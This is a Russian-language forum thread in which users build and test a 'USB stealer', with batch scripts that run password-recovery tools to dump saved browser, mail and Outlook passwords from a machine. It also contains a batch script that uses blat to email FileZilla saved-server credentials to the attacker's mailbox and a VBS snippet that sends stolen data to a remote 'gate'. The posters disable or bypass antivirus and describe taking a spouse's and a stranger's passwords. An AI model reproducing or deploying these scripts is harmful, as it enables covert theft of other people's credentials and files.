ВАЖНО Делаем простенький стилер сами


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Сейчас проэкспериментировал на своём компе.При подготовке флешки,"комодыч" матюгался на эти экзешники.Но так как софт этот легальный (надеюсь без твоих Олег доработок),то я отключил антивирь.Включил диалог при подключении носителей.Пункта "Проверить комп на вирусы" не было,может из-за того,что виндовс8.1.Запустил батник вручную.Тут проснулась проактивка и начала мне подробно рассказывать,что делает батник.Вырубил проактивку.Тут вроде всё пошло нормально,запустился КК...В итоге никаких паролей флеха не добыла,хотя у жены в хроме хранится пароль от ВК.Фаерфокс у меня только портабельный,а Оперы нету.Теперь попробуем на ком-нибудь другом.
Этот способ актуален сейчас?)
,а здесь с .Хотя сама сборка может старая,надо на этих прог глянуть.
З.Ы.А,Олег сейчас сидит и посмеивается,почитывая нашу почту и лички в разных акках :Mem11:
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 207
Должно-быть актуально, т.к. я на сколько понимаю пароли в браузерах не шифруются, или их можно расшифровать...

Можно сделать проще тогда, в батниках можно реализовать беккап данных, причом куда угодно, вплоть до на удалённый сервак, кстати в архиве в папке examples есть скрипт беккапа и отключения UAC, я-же приведу ещё один скрипт для беккапа:
Код:
rem формирует текущую дату
for /f "tokens=1-4 delims=/-\. " %%a in ('date /t') do (
set mjour=%%a
set mmois=%%b
set mannee=%%c
)
rem имя архива будет содержать текущую дату
set mydate=%mannee%%mmois%%mjour%
 
rem каталог, который будет архивироваться
set indir=C:\InFolder
 
rem выходной каталог, где будут храниться архивы копий
rem здесь локальный путь, его можно заменить
rem на сетевой \\NameServer\OutFolder, где NameServer -
rem имя машины, на которую будет сохраняться бэкап,
rem OutFolder – папка общего доступа на удаленной машине
set destdir=D:\OutFolder
 
rem путь до архиватора WinRar
set arcpath=С:\Program Files\WinRar
 
rem выполняем архивирование входного каталога
rem и сохраняем архив в выходной каталог
"%_arcpath%\rar" a -ep1 "%destdir%\%mydate%.rar" "%indir%"

Если поменять переменные на такое:

set indir=%SYSTEMDRIVE%\Users\ - скопирует все файлы пользователя;

set destdir=%~dp0\prog\log\ - адрес куда скопируются файлы...

В общем-то там ибудут пароли потом можно расшифровать их у себя тем-же MPR например...
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 207
Сейчас собрал более свежую и полную версию
А чо удалил-то пост, кстати батник верный и рабочий (Пути), такие пути, т.к. запуск с параметром, да просто архив видно старый был (Софт) поэтому и не определялись пароли...

И ещё Др. Веб палит эти проги как Password viewer, так-что их надо как-то скрывать !WinkSmile
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Сейчас собрал более свежую и полную версию .Из того списка,что предложена в более полной статье выбросил только программы :Dialupass,Netpass и WirelessKeyView,так как они запускаются от админа и выдают своё присутствие.Хотя это можно отрегулировать с помощью Hidden Start (только в платной версии).Сборка протестирована мною лично на живом железе.Эта хрень спиздила пароли жены из Хрома и посмотрела в мой Mozilla Thunderbird (но из него только адреса и настройки почты вытянула).Можете удалять лишние проги,но тогда удаляйте строку из батника,где прописана данная программа.
З.Ы.Выложил,а смотрю уже у Олега статья сделана.Удалил,переделал,но снова вернулся к скопипизженному батнику)Но со скриптом сокрытия админских прав я ещё не разобрался.
Код:
echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/OperaPassView.exe /stext prog/log/%computername%_Opera.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe
Пароль:111
 

Вложения

  • USB-stealer.rar
    1.4 МБ · Просмотры: 23

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Сейчас попробовал этот юсб-стилер на чужом ноуте с AVG на борту.Антивирь не стал отключать и он естественно всё заблочил влёт.Пришлось добавлять всё в исключение,чтоб он не сожрал мой сборник программ.В итоге выяснилось,что ChromePass не понимает русского текста.Пароль был написано русскими буквами,а он в логах выдал кракозябры.Пароли Фаерфокса не были обнаружены.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 207
Сейчас попробовал этот юсб-стилер на чужом ноуте с AVG на борту.Антивирь не стал отключать и он естественно всё заблочил влёт.Пришлось добавлять всё в исключение,чтоб он не сожрал мой сборник программ.В итоге выяснилось,что ChromePass не понимает русского текста.Пароль был написано русскими буквами,а он в логах выдал кракозябры.Пароли Фаерфокса не были обнаружены.
Вот как-будто новый, чтобы не заниматься копипастом, прилагаю ссылку на HH:
Вам нужно авторизоваться, чтобы просмотреть содержимое.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 207
Как при помощи батника стырить любой файл при помощи blat:

Стрёмно, что нужен blat, но АВ не палят, а делается всё просто:

Код:
copy %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml recentservers.xml
:send
blat.exe -install -server smtp.yandex.ru -port 587 -f Otkyda@yandex.ru -u Otkyda -pw MyPass
blat.exe -body text -to My@mail.ru -attach recentservers.xml

copy %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml recentservers.xml - Путь к нашему фаялу, в данном случае:recentservers.xml

blat.exe -install -server smtp.yandex.ru -port 587 -f Otkyda@yandex.ru -u Otkyda -pw MyPass -Почтовик с которого будем отсылать фаяло:

MyPass и Otkyda - Меняем на своё

blat.exe -body text -to My@mail.ru -attach recentservers.xml - Куда придёт письмо ! ;)

My@mail.ru-поменять на свой !

Пример в архиве:111
 

Вложения

  • Bat_stealer.zip
    509.8 КБ · Просмотры: 21
P

Polaris

Гость
Спасибо, а то с сайта в хромопасс в консольки не пашет а отсюда на ура. Вот только как ему задать чтобы пароли на кирилице понимал? или можно в другой формат сохранять?
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
А через батник можно реализовать отправку на гейт? Гейт юзать ведь куда лучше, чем пароли оставлять
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 207
В батнике незнаю, но на VBS можно гет-запросом например:
Код:
Set oHTTP = CreateObject("winhttp.winhttprequest.5.1")
sSource = "http://www.example.com/indo.php?var=" &text& "
oHTTP.open "GET", sSource, False
oHTTP.send
 
Верх Низ